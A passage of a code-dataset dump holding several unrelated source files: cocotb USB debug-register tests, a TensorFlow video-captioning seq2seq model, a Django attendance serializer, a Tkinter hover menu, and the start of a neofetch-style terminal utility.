test_debug_in(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n yield harness.write(harness.csrs['usb_address'], addr)\n # The \"scratch\" register defaults to 0x12345678 at boot.\n reg_addr = harness.csrs['ctrl_scratch']\n setup_data = [0xc3, 0x00,\n (reg_addr >> 0) & 0xff,\n (reg_addr >> 8) & 0xff,\n (reg_addr >> 16) & 0xff,\n (reg_addr >> 24) & 0xff, 0x04, 0x00]\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n\n yield harness.transaction_data_in(addr, epaddr_in, [0x2, 0x4, 0x6, 0x8, 0xa], chunk_size=64)\n\n yield harness.clear_pending(epaddr_out)\n yield harness.clear_pending(epaddr_in)\n\n # Setup stage\n yield harness.host_send_token_packet(PID.SETUP, addr, epaddr_out)\n yield harness.host_send_data_packet(PID.DATA0, setup_data)\n yield harness.host_expect_ack()\n\n # Data stage\n yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n yield harness.host_expect_data_packet(PID.DATA1, [0x12, 0, 0, 0])\n yield harness.host_send_ack()\n\n # Status stage\n yield harness.host_send_token_packet(PID.OUT, addr, epaddr_in)\n yield harness.host_send_data_packet(PID.DATA1, [])\n yield harness.host_expect_ack()\n\n# @cocotb.test()\n# def 
test_debug_in_missing_ack(dut):\n#     harness = UsbTest(dut)\n#     yield harness.reset()\n#     yield harness.connect()\n\n#     addr = 28\n#     reg_addr = harness.csrs['ctrl_scratch']\n#     setup_data = [0xc3, 0x00,\n#                   (reg_addr >> 0) & 0xff,\n#                   (reg_addr >> 8) & 0xff,\n#                   (reg_addr >> 16) & 0xff,\n#                   (reg_addr >> 24) & 0xff, 0x04, 0x00]\n#     epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n#     epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n\n#     # Setup stage\n#     yield harness.host_send_token_packet(PID.SETUP, addr, epaddr_out)\n#     yield harness.host_send_data_packet(PID.DATA0, setup_data)\n#     yield harness.host_expect_ack()\n\n#     # Data stage (missing ACK)\n#     yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n#     yield harness.host_expect_data_packet(PID.DATA1, [0x12, 0, 0, 0])\n\n#     # Data stage\n#     yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n#     yield harness.host_expect_data_packet(PID.DATA1, [0x12, 0, 0, 0])\n#     yield harness.host_send_ack()\n\n#     # Status stage\n#     yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n#     yield harness.host_send_data_packet(PID.DATA1, [])\n#     yield harness.host_expect_ack()\n\n@cocotb.test()\ndef test_debug_out(dut):\n    harness = UsbTest(dut)\n    yield harness.reset()\n    yield harness.connect()\n\n    addr = 28\n    yield harness.write(harness.csrs['usb_address'], addr)\n    reg_addr = harness.csrs['ctrl_scratch']\n    setup_data = [0x43, 0x00,\n                  (reg_addr >> 0) & 0xff,\n                  (reg_addr >> 8) & 0xff,\n                  (reg_addr >> 16) & 0xff,\n                  (reg_addr >> 24) & 0xff, 0x04, 0x00]\n    ep0in_addr = EndpointType.epaddr(0, EndpointType.IN)\n    ep1in_addr = EndpointType.epaddr(1, EndpointType.IN)\n    ep0out_addr = EndpointType.epaddr(0, EndpointType.OUT)\n\n    # Force Wishbone to acknowledge the packet\n    yield harness.clear_pending(ep0out_addr)\n    yield harness.clear_pending(ep0in_addr)\n    yield harness.clear_pending(ep1in_addr)\n\n    # Setup stage\n    yield harness.host_send_token_packet(PID.SETUP, addr, ep0out_addr)\n    yield harness.host_send_data_packet(PID.DATA0, setup_data)\n    yield harness.host_expect_ack()\n\n    # Data stage\n    yield harness.host_send_token_packet(PID.OUT, addr, ep0out_addr)\n    yield harness.host_send_data_packet(PID.DATA1, [0x42, 0, 0, 0])\n    yield harness.host_expect_ack()\n\n    # Status stage (wrong endpoint)\n    yield harness.host_send_token_packet(PID.IN, addr, ep1in_addr)\n    yield harness.host_expect_nak()\n\n    # Status stage\n    yield harness.host_send_token_packet(PID.IN, addr, ep0in_addr)\n    yield harness.host_expect_data_packet(PID.DATA1, [])\n    yield harness.host_send_ack()\n\n    new_value = yield harness.read(reg_addr)\n    if new_value != 0x42:\n        raise TestFailure(\"memory at 0x{:08x} should be 0x{:08x}, but memory value was 0x{:08x}\".format(reg_addr, 0x42, new_value))","sub_path":"sim/test-common.py","file_name":"test-common.py","file_ext":"py","file_size_in_byte":33760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"289299569","text":"# load data\nimport os, sys, json, time\nimport numpy as np\nimport tensorflow as tf\n\n# argv\nfpath_data_dir = sys.argv[1] + os.sep if len(sys.argv) > 1 else './data/MLDS_hw2_data/'\nfpath_test_output = sys.argv[2] if len(sys.argv) > 2 else 'test_atten.csv'\nfpath_peer_output = sys.argv[3] if len(sys.argv) > 3 else 'peer.csv'\n\n# file path\nfpath_train_data = fpath_data_dir + 'training_data/feat/'\nfpath_train_label = fpath_data_dir + 'training_label.json'\nfpath_test_data = fpath_data_dir + 'testing_data/feat/'\nfpath_test_ids = fpath_data_dir + 'testing_id.txt'\nfpath_peer_data = 
fpath_data_dir + 'peer_review/feat/'\nfpath_peer_ids = fpath_data_dir + 'peer_review_id.txt'\n\n# train\nrun_train = False\n\ndef load_train_data(fpath_data, fpath_label, word2id=None):\n    \"\"\"Load Training Data\"\"\"\n    print('Load Training Data ...')\n    start_time = time.time()\n    # if no word2id\n    if word2id is None:\n        word2id = dict()\n        word2id['<pad>'] = len(word2id) # padding\n        word2id['<bos>'] = len(word2id) # begin of sentence\n        word2id['<eos>'] = len(word2id) # end of sentence\n        word2id['<unk>'] = len(word2id) # unknown\n    # load data\n    X, Ys, video_ids = [], [], []\n    for video in json.load(open(fpath_label, 'r')): # each video\n        video_id = video['id']\n        video_labels = video['caption']\n        video_feature = np.load(fpath_data + video_id + '.npy')\n        # word2id\n        for caption_idx, caption in enumerate(video_labels): # each caption\n            caption = caption.lower().strip().strip('.').split()\n            caption = ['<bos>'] + caption + ['<eos>']\n            for word_idx, word in enumerate(caption): # each word\n                if word not in word2id:\n                    word2id[word] = len(word2id)\n                caption[word_idx] = word2id[word]\n            video_labels[caption_idx] = caption\n        # append\n        X.append(video_feature)\n        Ys.append(video_labels)\n        video_ids.append(video_id)\n    # return\n    print('Time: {:.2f}s'.format(time.time()-start_time))\n    return X, Ys, video_ids, word2id\n\n\ndef load_test_data(fpath_data, fpath_test_ids):\n    \"\"\"Load Testing Data\"\"\"\n    print('Load Testing Data ...')\n    start_time = time.time()\n    # load data\n    X, video_ids = [], []\n    for line in open(fpath_test_ids, 'r'): # each video\n        video_id = line.strip()\n        video_feature = np.load(fpath_data + video_id + '.npy')\n        # append\n        X.append(video_feature)\n        video_ids.append(video_id)\n    # return\n    print('Time: {:.2f}s'.format(time.time()-start_time))\n    return X, video_ids\n\n\ntrain_X, train_Ys, train_video_ids, word2id = load_train_data(fpath_train_data, fpath_train_label)\nid2word = dict(zip(word2id.values(), word2id))\n\n# params\nfeature_dim = train_X[0].shape[1]\nvocab_size = len(word2id)\nmax_frame_len = train_X[0].shape[0]\nmax_sent_len = np.array([len(caption) for video in train_Ys for caption in video]).max()\nprint('feature_dim:', feature_dim)\nprint('vocab_size:', vocab_size)\nprint('max_frame_len:', max_frame_len)\nprint('max_sent_len:', max_sent_len)\n\n# padding Ys\nfor video_idx, video in enumerate(train_Ys):\n    for caption_idx, caption in enumerate(video):\n        if len(caption) < max_sent_len:\n            video[caption_idx] += [0]*(max_sent_len-len(caption))\n    train_Ys[video_idx] = np.array(video)\n\n\nclass Seq2seq(object):\n    def __init__(self, input_dim, vocab_size, hidden_dim, encode_steps, decode_steps, load_model_path=None):\n        # params\n        self._input_dim = input_dim\n        self._vocab_size = vocab_size\n        self._hidden_dim = hidden_dim\n        self._encode_steps = encode_steps # video\n        self._decode_steps = decode_steps # caption\n        # placeholders\n        tf.reset_default_graph()\n        self.inputs = tf.placeholder(tf.float32, [None, self._encode_steps, self._input_dim]) # (batch_size, video_steps, features)\n        self.caption = tf.placeholder(tf.int32, [None, self._decode_steps]) # (batch_size, caption_steps)\n        self.batch_size = tf.placeholder(tf.int32) # number of videos\n        self.ground_truth_prob = tf.placeholder(tf.float32) # feed truth/predict word. 0.~1. if train, 0. 
if test\n        # variables\n        self.encode_image_W = tf.Variable(tf.truncated_normal([self._input_dim, self._hidden_dim], stddev=0.1), name='encode_image_W')\n        self.encode_image_B = tf.Variable(tf.zeros([self._hidden_dim]), name='encode_image_B')\n        self.word_emb = tf.Variable(tf.truncated_normal([self._vocab_size, self._hidden_dim], stddev=0.1), name='word_emb')\n        self.lstm1 = tf.nn.rnn_cell.BasicLSTMCell(self._hidden_dim, state_is_tuple=True) # encode\n        self.lstm2 = tf.nn.rnn_cell.BasicLSTMCell(self._hidden_dim, state_is_tuple=True) # decode\n        self.decode_word_W = tf.Variable(tf.truncated_normal([self._hidden_dim, self._vocab_size], stddev=0.1), name='decode_word_W')\n        self.decode_word_B = tf.Variable(tf.zeros([self._vocab_size]), name='decode_word_B')\n        self.optimizer = tf.train.AdamOptimizer(learning_rate=0.001, name='Adam')\n        # models\n        self.pred = self._build_predict()\n        self.loss = self._build_loss()\n        self.optimize = self._build_optimize()\n        self.accuracy = self._build_accuracy()\n        # vars\n        self.vars = {var.name: var for var in tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)}\n        self.saver = tf.train.Saver(self.vars)\n        # init session\n        self.sess = tf.Session()\n        # restore model\n        if load_model_path is not None:\n            self.load(load_model_path)\n        else:\n            self.sess.run(tf.global_variables_initializer())\n    \n    def _build_predict(self):\n        print('build predict')\n        # dense (batch_size, video_steps, features) -> (batch_size, video_steps, hidden)\n        video_flat = tf.reshape(self.inputs, [-1, self._input_dim])\n        image_emb = tf.nn.xw_plus_b(video_flat, self.encode_image_W, self.encode_image_B)\n        image_emb = tf.nn.relu(image_emb)\n        image_emb = tf.reshape(image_emb, [-1, self._encode_steps, self._hidden_dim])\n        # lstm encode\n        state1_c = tf.zeros([self.batch_size, self.lstm1.state_size[0]])\n        state1_h = tf.zeros([self.batch_size, self.lstm1.state_size[1]])\n        state2_c = tf.zeros([self.batch_size, self.lstm2.state_size[0]])\n        state2_h = tf.zeros([self.batch_size, self.lstm2.state_size[1]])\n        padding = tf.zeros([self.batch_size, self._hidden_dim])\n        encode_hs = []\n        for step in range(0, self._encode_steps):\n            with tf.variable_scope(tf.get_variable_scope()):\n                if step > 0:\n                    tf.get_variable_scope().reuse_variables()\n                output1, (state1_c, state1_h) = self.lstm1(tf.concat([padding, image_emb[:,step,:]], 1), (state1_c, state1_h), scope='lstm1')\n                output2, (state2_c, state2_h) = self.lstm2(tf.concat([padding, output1], 1), (state2_c, state2_h), scope='lstm2')\n                encode_hs.append(output1)\n        # attention\n        encode_hs = tf.stack(encode_hs, axis=0) # t x b x h\n        encode_hs = tf.transpose(encode_hs, [1,0,2]) # b x t x h \n        def attention_context(encode_hs, decode_h):\n            # encode_hs -> b x t x h\n            # alpha\n            alphas = tf.multiply(encode_hs, tf.expand_dims(decode_h, 1))\n            alphas = tf.reduce_sum(alphas, 2, keep_dims=True)\n            # weighted sum\n            alphas = tf.nn.softmax(alphas, 1)\n            context = tf.multiply(encode_hs, alphas)\n            context = tf.reduce_sum(context, axis=1)\n            return context\n        # lstm decode\n        caption = tf.pad(self.caption, [[0,0],[0,1]]) # padding one more step\n        output_captions = []\n        for step in range(0, self._decode_steps+1):\n            with tf.variable_scope(tf.get_variable_scope()):\n                # randomly select the ground-truth or predicted word according to self.ground_truth_prob\n                previous_word_gt = caption[:, step] # ground truth\n                previous_word_pred = tf.cast(tf.argmax(output2, axis=1), tf.int32) # predict\n                indice = tf.multinomial(tf.log([[self.ground_truth_prob, 1-self.ground_truth_prob]]), 1)\n                indice = tf.squeeze(indice, [0])\n                previous_word = 
tf.gather(tf.stack([previous_word_gt, previous_word_pred]), indice)\n previous_word = tf.squeeze(previous_word, [0])\n # word embedding\n with tf.device(\"/cpu:0\"):\n previous_word_embed = tf.nn.embedding_lookup(self.word_emb, previous_word)\n # feed\n tf.get_variable_scope().reuse_variables()\n output1, (state1_c, state1_h) = self.lstm1(tf.concat([previous_word_embed, padding], 1), (state1_c, state1_h), scope='lstm1')\n # attention\n context = attention_context(encode_hs, output1)\n output2, (state2_c, state2_h) = self.lstm2(tf.concat([context, output1], 1), (state2_c, state2_h), scope='lstm2')\n output_captions.append(output2)\n output = tf.stack(output_captions[:-1], axis=1) # stack with step, ignore last padding step\n # dense \n output = tf.reshape(output, [-1, self._hidden_dim])\n output = tf.nn.xw_plus_b(output, self.decode_word_W, self.decode_word_B)\n output = tf.nn.softmax(output) \n output = tf.reshape(output, [-1, self._decode_steps, self._vocab_size]) \n return output\n \n def _build_loss(self):\n print('build loss')\n caption = tf.pad(self.caption, [[0,0],[0,1]]) # padding one more step\n caption = caption[:,1:]\n mask = tf.cast(tf.not_equal(caption, 0), tf.float32)\n mask /= tf.reduce_mean(tf.reduce_mean(mask))\n caption = tf.one_hot(caption, depth=self._vocab_size, axis=2)\n cross_entropy = caption * tf.log(self.pred)\n cross_entropy = -tf.reduce_mean(cross_entropy, axis=2)\n cross_entropy *= mask\n cross_entropy = tf.reduce_mean(cross_entropy, axis=1)\n return tf.reduce_mean(cross_entropy)\n \n def _build_optimize(self):\n print('build optimize')\n clip_value = 1.\n trainable_variables = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(self.loss, trainable_variables), clip_value)\n return self.optimizer.apply_gradients(zip(grads, trainable_variables))\n \n def _build_accuracy(self):\n print('build accuracy')\n caption = tf.pad(self.caption, [[0,0],[0,1]]) # padding one more step\n caption = caption[:,1:]\n correct = tf.equal(caption, tf.cast(tf.argmax(self.pred, 2), tf.int32))\n correct = tf.cast(correct, tf.float32)\n mask = tf.cast(tf.not_equal(caption, 0), tf.float32)\n mask /= tf.reduce_mean(tf.reduce_mean(mask))\n correct *= mask\n return tf.reduce_mean(tf.reduce_mean(correct))\n \n def fit(self, train, valid=None, ground_truth_prob=1., ground_truth_prob_decay=0.99 ,num_epochs=10, batch_size=32, eval_every=1, shuffle=False, save_min_loss=False, id2word=None):\n train_X = np.array(train[0], dtype='float32')\n train_Y = np.array(train[1])\n min_loss = 0.\n for epoch in range(num_epochs):\n # shuffle\n if shuffle:\n shuffle_idx = np.random.permutation(len(train_X))\n train_X = train_X[shuffle_idx]\n train_Y = train_Y[shuffle_idx]\n # epoch\n num_steps = (len(train_X)-1)//batch_size + 1\n for step in range(num_steps):\n batch_x = train_X[step*batch_size : step*batch_size+batch_size]\n batch_y = train_Y[step*batch_size : step*batch_size+batch_size]\n batch_y = np.array([y[np.random.randint(len(y), size=1)[0]] for y in batch_y], dtype='int32')\n # run\n self.sess.run(self.optimize, feed_dict={self.inputs: batch_x, \n self.caption: batch_y, \n self.batch_size: len(batch_x), \n self.ground_truth_prob: ground_truth_prob})\n loss, acc = self.evaluate(batch_x, batch_y, batch_size=batch_size)\n print('epoch:{:>2d}/{:<2d} batch:{:>4d}/{:<4d} gt_prob:{:<.3f} '.format(epoch+1, \n num_epochs, \n step*batch_size, \n num_steps*batch_size, \n ground_truth_prob), \n end='')\n print('loss:{:<3.5f} acc:{:>3.1f}% '.format(loss, 100*acc), end='')\n # evaluation\n if 
step % eval_every == 0 and valid is not None:\n                    valid_x = np.array(valid[0], dtype='float32')\n                    valid_y = np.array(valid[1])\n                    valid_y = np.array([y[np.random.randint(len(y), size=1)[0]] for y in valid_y], dtype='int32')\n                    val_loss, val_acc = self.evaluate(valid_x, valid_y, batch_size=batch_size)\n                    print('val_loss:{:<3.5f} val_acc:{:>3.1f}% '.format(val_loss, 100*val_acc), end='')\n                    # save_min_loss\n                    if save_min_loss and (min_loss == 0. or val_loss < min_loss):\n                        min_loss = val_loss\n                        self.save('./models/atten_best', verbose=False)\n                        print('save min loss model {:.5f} '.format(min_loss), end='')\n                    # visual\n                    if id2word is not None:\n                        sample_idx = np.random.randint(len(valid_x))\n                        visual_x = self.predict(valid_x[sample_idx:sample_idx+1])\n                        visual_y = valid_y[sample_idx:sample_idx+1]\n                        print()\n                        print('    visual_model: {}'.format(self.visual(visual_x, id2word)[0]))\n                        print('    visual_truth: {} '.format(self.visual(visual_y, id2word)[0]), end='')\n                print()\n            # update prob\n            ground_truth_prob = max(ground_truth_prob*ground_truth_prob_decay, 0.5)\n    \n    def evaluate(self, x, y, batch_size=32):\n        losses, accs = [], []\n        offset = 0\n        while offset < len(x):\n            batch_x = x[offset : offset+batch_size]\n            batch_y = y[offset : offset+batch_size]\n            loss, acc = self.sess.run([self.loss, self.accuracy], feed_dict={self.inputs: batch_x, \n                                                                            self.caption: batch_y, \n                                                                            self.batch_size: len(batch_x), \n                                                                            self.ground_truth_prob: 0.})\n            losses += [loss] * len(batch_x)\n            accs += [acc] * len(batch_x)\n            offset += batch_size\n        return np.array(losses).mean(), np.array(accs).mean()\n    \n    def predict(self, x, batch_size=32):\n        preds = []\n        offset = 0\n        while offset < len(x):\n            batch_x = x[offset : offset+batch_size]\n            batch_y = np.zeros([len(batch_x), self._decode_steps], dtype='int32')\n            pred = self.sess.run(self.pred, feed_dict={self.inputs: batch_x, \n                                                       self.caption: batch_y, \n                                                       self.batch_size: len(batch_x), \n                                                       self.ground_truth_prob: 0.})\n            preds.append(np.argmax(pred, axis=2))\n            offset += batch_size\n        return np.vstack(preds)\n    \n    def visual(self, ys, id2word):\n        results = []\n        for pred in ys:\n            pred_words = np.vectorize(id2word.get)(pred)\n            start_idx = np.where(pred_words=='<bos>')[0][0] if '<bos>' in pred_words else 0\n            end_idx = np.where(pred_words=='<eos>')[0][0] if '<eos>' in pred_words else len(pred_words)\n            sentence = ' '.join(pred_words[start_idx:end_idx+1])\n            sentence = sentence.replace('<bos>','').replace('<eos>','').strip()\n            results.append(sentence)\n        return results\n    \n    def save(self, checkpoint_file_path, verbose=True):\n        if not os.path.exists(os.path.dirname(checkpoint_file_path)):\n            os.makedirs(os.path.dirname(checkpoint_file_path))\n        self.saver.save(self.sess, checkpoint_file_path)\n        if verbose: print('Model saved to: {}'.format(checkpoint_file_path))\n    \n    def load(self, checkpoint_file_path, verbose=True):\n        self.saver.restore(self.sess, checkpoint_file_path)\n        if verbose: print('Model restored from: {}'.format(checkpoint_file_path))\n    \n    def summary(self):\n        print('='*50)\n        print('Summary:')\n        variables = [variable for variable in tf.trainable_variables()]\n        total_parms = 0\n        for variable in variables:\n            name = variable.name\n            shape = variable.shape\n            parms = np.array(list(variable.shape), dtype='int32').prod()\n            print('Var: {} shape: {} parms: {:,}'.format(name, shape, parms))\n            total_parms += parms\n        print('='*50)\n        print('Total Parameters: {:,}'.format(total_parms))\n\nmodel = Seq2seq(feature_dim, vocab_size, 512, max_frame_len, max_sent_len, load_model_path='models/atten/atten_finish')\nmodel.summary()\n\nif run_train:\n    try:\n        
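# run the training loop; a Ctrl+C (KeyboardInterrupt) falls through so the model is still saved below\n        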
model.fit(train=[train_X[:], train_Ys[:]], \n                  valid=[train_X[-50:], train_Ys[-50:]], \n                  num_epochs=100, \n                  batch_size=128,\n                  ground_truth_prob=1., \n                  ground_truth_prob_decay=0.997,\n                  shuffle=True,\n                  eval_every=1,\n                  save_min_loss=False,\n                  id2word=id2word)\n    except KeyboardInterrupt: # ctrl + c\n        pass\n    model.save('./tmp/atten_finish')\n\n    \n# output test\ntest_X, test_video_ids = load_test_data(fpath_test_data, fpath_test_ids)\npreds = model.predict(test_X)\npreds = model.visual(preds, id2word)\nwith open(fpath_test_output, 'w') as o:\n    for sent, video_id in zip(preds, test_video_ids):\n        _ = o.write('{},{}\\n'.format(video_id, sent))\n\npeer_X, peer_video_ids = load_test_data(fpath_peer_data, fpath_peer_ids)\npreds = model.predict(peer_X)\npreds = model.visual(preds, id2word)\nwith open(fpath_peer_output, 'w') as o:\n    for sent, video_id in zip(preds, peer_video_ids):\n        _ = o.write('{},{}\\n'.format(video_id, sent))\n\n","sub_path":"hw2/model_atten.py","file_name":"model_atten.py","file_ext":"py","file_size_in_byte":18882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"498775041","text":"from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist\nfrom rest_framework import serializers\n\nfrom upday.field.encrypt_field import EncryptField\nfrom upday.models import Share, AnswerBoard, DailyAttendance\n\n\nclass CreateValidator(serializers.Serializer):\n    \"\"\"\n    Complete the check-in and create the daily attendance record\n    \"\"\"\n    answer_board_id = EncryptField('HASH_KEY_ANSWER_BOARD_ID')\n\n    def validate(self, attrs):\n        student = self.context['request'].user\n        try:\n            answer_board = AnswerBoard.objects.get(id=attrs['answer_board_id'])\n        except MultipleObjectsReturned:\n            msg = {'result': 'Multiple answer_board'}\n            raise serializers.ValidationError(msg, code='validation')\n        except ObjectDoesNotExist:\n            msg = {'result': 'No such answer_board'}\n            raise serializers.ValidationError(msg, code='validation')\n        try:\n            # A page refresh may call this endpoint again, so reuse an existing record\n            daily_attendance = DailyAttendance.objects.get(answer_board=answer_board)\n        except MultipleObjectsReturned:\n            msg = {'result': 'Multiple daily_attendance'}\n            raise serializers.ValidationError(msg, code='validation')\n        except ObjectDoesNotExist:\n            # Create the daily sign-in\n            share = Share.objects.create(sharer=student, type=1)\n            daily_attendance = DailyAttendance.objects.create(share=share, answer_board=answer_board)\n        attrs['daily_attendance'] = daily_attendance\n        return attrs\n\n\nclass CheckValidator(serializers.Serializer):\n    \"\"\"\n    View another user's daily sign-in\n    \"\"\"\n    daily_attendance_id = EncryptField('HASH_KEY_DAILY_ATTENDANCE_ID')\n\n    def validate(self, attrs):\n        daily_attendance_id = attrs['daily_attendance_id']\n        student = self.context['request'].user\n        try:\n            daily_attendance = DailyAttendance.objects.get(id=daily_attendance_id)\n        except MultipleObjectsReturned:\n            msg = {'result': 'Multiple daily_attendance'}\n            raise serializers.ValidationError(msg, code='validation')\n        except ObjectDoesNotExist:\n            msg = {'result': 'No such daily_attendance'}\n            raise serializers.ValidationError(msg, code='validation')\n        attrs['daily_attendance'] = daily_attendance\n        if daily_attendance.share.sharer != student:\n            is_myself = 0\n        else:\n            is_myself = 1\n        attrs['is_myself'] = is_myself\n        return attrs\n","sub_path":"upday/modules/daily_attendance/serializer/daily_attendance_serializer.py","file_name":"daily_attendance_serializer.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"149965231","text":"from tkinter import *\nimport re\n\nclass HoverInfo(Menu):\n def __init__(self, parent, text, command=None):\n self._com = command\n Menu.__init__(self,parent, tearoff=0)\n if not isinstance(text, str):\n raise TypeError('Trying to initialise a Hover Menu with a non string type: ' + text.__class__.__name__)\n toktext=re.split('\\n', text)\n for t in toktext:\n self.add_command(label = t)\n self._displayed=False\n self.master.bind(\"\",self.Display )\n self.master.bind(\"\",self.Remove )\n\n def __del__(self):\n self.master.unbind(\"\")\n self.master.unbind(\"\")\n\n def Display(self,event):\n if not self._displayed:\n self._displayed=True\n self.post(event.x_root, event.y_root)\n if self._com != None:\n self.master.unbind_all(\"\")\n self.master.bind_all(\"\", self.Click)\n\n def Remove(self, event):\n if self._displayed:\n self._displayed=False","sub_path":"HoverClass.py","file_name":"HoverClass.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"348678286","text":"from __future__ import annotations\n\nimport os\nimport platform\nimport re\nimport shlex\nimport shutil\nimport subprocess\nimport sys\nimport zipfile\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom subprocess import check_output\nfrom tempfile import TemporaryDirectory\nfrom typing import Iterable\n\nimport pkg_resources\n\nfrom .color_util import color, printc\nfrom .constants import GLOBAL_CFG, MINGIT_URL, IS_WINDOWS\nfrom .distros import distro_detector\nfrom .presets import ColorProfile\nfrom .serializer import from_dict\nfrom .types import BackendLiteral, ColorAlignMode\n\nRE_NEOFETCH_COLOR = re.compile('\\\\${c[0-9]}')\n\n\ndef literal_input(prompt: str, options: Iterable[str], default: str, show_ops: bool = True) -> str:\n \"\"\"\n Ask the user to provide an input among a list of options\n\n :param prompt: Input prompt\n :param options: Options\n :param default: Default option\n :param show_ops: Show options\n :return: Selection\n \"\"\"\n options = list(options)\n lows = [o.lower() for o in options]\n\n if show_ops:\n op_text = '|'.join([f'&l&n{o}&L&N' if o == default else o for o in options])\n printc(f'{prompt} ({op_text})')\n else:\n printc(f'{prompt} (default: {default})')\n\n def find_selection(sel: str):\n if not sel:\n return None\n\n # Find exact match\n if sel in lows:\n return options[lows.index(sel)]\n\n # Find starting abbreviation\n for i, op in enumerate(lows):\n if op.startswith(sel):\n return options[i]\n\n return None\n\n selection = input('> ').lower() or default\n while not find_selection(selection):\n print(f'Invalid selection! 
{selection} is not one of {\"|\".join(options)}')\n selection = input('> ').lower() or default\n\n print()\n\n return find_selection(selection)\n\n\ndef term_size() -> tuple[int, int]:\n \"\"\"\n Get terminal size\n :return:\n \"\"\"\n try:\n return os.get_terminal_size().columns, os.get_terminal_size().lines\n except Exception:\n return 100, 20\n\n\ndef ascii_size(asc: str) -> tuple[int, int]:\n \"\"\"\n Get distro ascii width, height ignoring color code\n\n :param asc: Distro ascii\n :return: Width, Height\n \"\"\"\n return max(len(line) for line in re.sub(RE_NEOFETCH_COLOR, '', asc).split('\\n')), len(asc.split('\\n'))\n\n\ndef normalize_ascii(asc: str) -> str:\n \"\"\"\n Make sure every line are the same width\n \"\"\"\n w = ascii_size(asc)[0]\n return '\\n'.join(line + ' ' * (w - ascii_size(line)[0]) for line in asc.split('\\n'))\n\n\ndef fill_starting(asc: str) -> str:\n \"\"\"\n Fill the missing starting placeholders.\n\n E.g. \"${c1}...\\n...\" -> \"${c1}...\\n${c1}...\"\n \"\"\"\n new = []\n last = ''\n for line in asc.split('\\n'):\n new.append(last + line)\n\n # Line has color placeholders\n matches = RE_NEOFETCH_COLOR.findall(line)\n if len(matches) > 0:\n # Get the last placeholder for the next line\n last = matches[-1]\n\n return '\\n'.join(new)\n\n\n@dataclass\nclass ColorAlignment:\n mode: ColorAlignMode\n\n # custom_colors[ascii color index] = unique color index in preset\n custom_colors: dict[int, int] = ()\n\n # Foreground/background ascii color index\n fore_back: tuple[int, int] = ()\n\n @classmethod\n def from_dict(cls, d: dict):\n return from_dict(cls, d)\n\n def recolor_ascii(self, asc: str, preset: ColorProfile) -> str:\n \"\"\"\n Use the color alignment to recolor an ascii art\n\n :return Colored ascii, Uncolored lines\n \"\"\"\n asc = fill_starting(asc)\n\n if self.fore_back and self.mode in ['horizontal', 'vertical']:\n fore, back = self.fore_back\n\n # Replace foreground colors\n asc = asc.replace(f'${{c{fore}}}', color('&0' if GLOBAL_CFG.is_light else '&f'))\n lines = asc.split('\\n')\n\n # Add new colors\n if self.mode == 'horizontal':\n colors = preset.with_length(len(lines))\n asc = '\\n'.join([l.replace(f'${{c{back}}}', colors[i].to_ansi()) + color('&~&*') for i, l in enumerate(lines)])\n else:\n raise NotImplementedError()\n\n # Remove existing colors\n asc = re.sub(RE_NEOFETCH_COLOR, '', asc)\n\n elif self.mode in ['horizontal', 'vertical']:\n # Remove existing colors\n asc = re.sub(RE_NEOFETCH_COLOR, '', asc)\n lines = asc.split('\\n')\n\n # Add new colors\n if self.mode == 'horizontal':\n colors = preset.with_length(len(lines))\n asc = '\\n'.join([colors[i].to_ansi() + l + color('&~&*') for i, l in enumerate(lines)])\n else:\n asc = '\\n'.join(preset.color_text(line) + color('&~&*') for line in lines)\n\n else:\n preset = preset.unique_colors()\n\n # Apply colors\n color_map = {ai: preset.colors[pi].to_ansi() for ai, pi in self.custom_colors.items()}\n for ascii_i, c in color_map.items():\n asc = asc.replace(f'${{c{ascii_i}}}', c)\n\n return asc\n\n\ndef if_file(f: str | Path) -> Path | None:\n \"\"\"\n Return the file if the file exists, or return none. Useful for chaining 'or's\n \"\"\"\n f = Path(f)\n if f.is_file():\n return f\n return None\n\n\ndef get_command_path() -> str:\n \"\"\"\n Get the absolute path of the neofetch command\n\n :return: Command path\n \"\"\"\n cmd_path = pkg_resources.resource_filename(__name__, 'scripts/neowofetch')\n\n # Windows doesn't support symbolic links, but also I can't detect symbolic links... 
hard-code it here for now.\n if IS_WINDOWS:\n pkg = Path(__file__).parent\n pth = (shutil.which(\"neowofetch\") or\n if_file(cmd_path) or\n if_file(pkg / 'scripts/neowofetch') or\n if_file(pkg.parent / 'neofetch') or\n if_file(Path(cmd_path).parent.parent.parent / 'neofetch'))\n\n if not pth:\n printc(\"&cError: Neofetch script cannot be found\")\n exit(127)\n\n return str(pth)\n\n return cmd_path\n\n\ndef ensure_git_bash() -> Path:\n \"\"\"\n Ensure git bash installation for windows\n\n :returns git bash path\n \"\"\"\n if IS_WINDOWS:\n # Find installation in default path\n def_path = Path(r'C:\\Program Files\\Git\\bin\\bash.exe')\n if def_path.is_file():\n return def_path\n\n # Detect third-party git.exe in path\n git_exe = shutil.which(\"bash\") or shutil.which(\"git.exe\") or shutil.which(\"git\")\n if git_exe is not None:\n pth = Path(git_exe).parent\n if (pth / r'bash.exe').is_file():\n return pth / r'bash.exe'\n elif (pth / r'bin\\bash.exe').is_file():\n return pth / r'bin\\bash.exe'\n\n # Find installation in PATH (C:\\Program Files\\Git\\cmd should be in path)\n pth = (os.environ.get('PATH') or '').lower().split(';')\n pth = [p for p in pth if p.endswith(r'\\git\\cmd')]\n if pth:\n return Path(pth[0]).parent / r'bin\\bash.exe'\n\n # 